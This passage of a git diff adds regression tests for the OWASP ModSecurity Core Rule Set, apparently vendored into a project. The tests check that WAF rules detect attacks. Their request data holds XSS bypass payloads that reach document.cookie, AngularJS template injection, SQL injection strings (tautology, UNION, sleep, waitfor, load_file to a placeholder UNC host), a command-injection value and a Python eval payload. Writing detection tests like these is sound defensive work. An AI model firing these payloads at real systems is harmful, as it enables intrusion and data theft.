+ data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml new file mode 100644 index 000000000..a49f951f5 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -0,0 +1,147 @@ +--- +meta: + author: "Andrea Menin" + description: None + enabled: true + name: 941370.yaml +tests: + - test_title: 941370-1 + desc: "Bypass using comment in syntax and multiple whitespaces" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-2 + desc: "Bypass using comments in syntax" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-3 + desc: "Bypass using JavaScript global variables" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-4 + desc: "Bypass using JavaScript global variables and comments in syntax" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-5 + desc: "Bypass using JavaScript global variables and string concatenation" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-6 + desc: "Bypass using JavaScript global variables and comments in syntax" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-7 + desc: "Bypass using JavaScript global variables and jQuery globalEval" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-8 + desc: "Bypass using JavaScript global variables and hex escape sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-9 + desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_title: 941370-10 + desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml new file mode 100644 index 000000000..499396468 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml @@ -0,0 +1,24 @@ +--- +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 941380.yaml +tests: + - test_title: 941380-1 + desc: "AngularJS client side template injection detection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "*/*" + User-Agent: "ModSecurity CRS 3 Tests" + method: GET + port: 80 + uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' + # /login?user={{constructor.constructor('alert(1)')()}} + version: HTTP/1.1 + output: + log_contains: id "941380" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml new file mode 100644 index 000000000..6b6576ca2 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -0,0 +1,217 @@ +--- +meta: + author: "Christian Folini" + description: Various SQL injection tests + enabled: true + name: 942100.yaml +tests: + - test_title: 942100-1 + desc: "Simple SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-4 + desc: "Basic SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-5 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue' and 526=527" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-6 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-7 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-8 + desc: "Simple SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-9 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-10 + desc: "Advanced SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-11 + desc: "Simple function call" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-12 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-13 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_title: 942100-14 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log_contains: id "942100" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml new file mode 100644 index 000000000..54893dc2c --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml @@ -0,0 +1,91 @@ +--- +meta: + author: "Christian Folini" + description: Various SQL injection tests + enabled: true + name: 942101.yaml +tests: + - test_title: 942101-1 + desc: "Simple SQL Injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/1234%20OR%201=1" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-2 + desc: "Basic SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-4 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-5 + desc: "Simple function call" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_title: 942101-6 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log_contains: id "942101" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml new file mode 100644 index 000000000..21900265f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml @@ -0,0 +1,22 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942110.yaml +tests: + - test_title: 942110-1 + desc: "Common SQL Injection Testing" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + # NB: false positives: /?var=\'\' + data: "var=%27%27" + version: HTTP/1.0 + output: + log_contains: id "942110" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml new file mode 100644 index 000000000..58d77373e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -0,0 +1,321 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942120.yaml +tests: + - test_title: 942120-1 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-2 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-3 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ">>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-4 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-5 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "<<" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-6 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "%21%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-7 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "||" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-8 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "XOR" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-9 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-10 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "IS NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-11 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "in (0,1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-12 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-13 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-14 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "regexp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-15 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "RLIKE" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-16 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "<>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-17 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-18 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-19 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-20 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-21 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "%3E%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml new file mode 100644 index 000000000..b968ec550 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -0,0 +1,112 @@ +--- +meta: + author: "Christian S.J. Peron and Allan Boll" + description: None + enabled: true + name: 942130.yaml +tests: + - test_title: 942130-1 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" + version: HTTP/1.0 + output: + no_log_contains: id "942130" + - test_title: 942130-2 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + uri: "/?a=1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-3 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + uri: "/?a=11=1" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-4 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + uri: "/?a=1=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-5 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + uri: "/?a=11!=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-6 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + uri: "/?a=1!=11" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-7 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + uri: "/?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-8 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + uri: "/?a=b,1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml new file mode 100644 index 000000000..1f99f8bb8 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -0,0 +1,261 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942140.yaml +tests: + - test_title: 942140-1 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + uri: "/?sql_table=pg_catalog" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-2 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "INFORMATION_SCHEMA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-3 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "database(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-4 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "db_name(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-5 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "DaTaBasE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-6 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "InFoRmaTioN_ScHemA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-7 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "DB_NAME(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-8 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "tempdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-9 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "msdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-10 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "mysql.db" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-11 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "MSysAccessObjects" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-12 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "Northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-13 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-14 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SCHEMA_NAME" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-15 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "DATABASE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-16 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "schema_name" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-17 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "information_schema" + version: HTTP/1.0 + output: + log_contains: id "942140" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml new file mode 100644 index 000000000..ca19c5f81 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -0,0 +1,291 @@ +--- +meta: + author: "Christian Folini" + description: Various SQL injection tests + enabled: true + name: 942150.yaml +tests: + - test_title: 942150-1 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-4 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-5 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-6 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-7 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-8 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-9 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=None')and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-10 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-11 + desc: "Simple 